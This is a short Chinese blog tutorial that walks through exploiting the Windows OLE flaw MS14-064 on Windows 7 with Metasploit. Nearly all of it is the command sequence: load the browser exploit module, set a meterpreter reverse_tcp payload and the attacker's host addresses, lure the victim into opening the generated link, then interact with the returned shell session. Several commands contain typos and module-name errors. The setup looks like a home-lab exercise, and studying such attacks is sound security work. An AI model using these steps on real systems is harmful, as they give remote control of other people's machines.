kali linux 2.0入侵windiws7系统 ------ms14-064漏洞

漏洞介绍：

Microsoft Windows OLE远程代码执行漏洞，OLE（对象链接与嵌入）是一种允许应用程序共享数据和功能的技术，

远程攻击者利用此漏洞通过构造的网站执行任意代码，影响Win95+IE3 – Win10+IE11全版本...

metasploit里已经加入了此漏洞的利用模块 ：exploit/windows/browser/ms14_064_ole_code_execution

1.所需工具：kali linux系统 ，windows7系统 

2.在kali linux开启msfconsole

step1：命令：search ms14-064

命令：use exploit windows/browser/ms14-064-ole-code-excution

命令：show payloads

命令：set payload windows/meterpreter/reverse_tcp

命令：set ALLOWPOWERSHELLPROMPT true                   //

因为msf中自带的漏洞利用exp调用的是 powershell，

所以msf（Metasploit Framework）中的exp代码只对安装powershell的系统生效。win7系统安装自带powershell，

所以我们这里测试受害的机器为windows7 32位.

命令：show options

命令：set srvhost 本地ip 

命令：set  lhost  本地ip 

命令：rexploit

升成链接，

3.将升成的链接在windows7中的浏览器中打开，打开一个弹窗，点击允许。

4.在kali linux 中收到一个反弹链接会话。

命令：sessions -i

命令：sessions -i 1

参考文章：https://blog.csdn.net/nzjdsds/article/details/81912349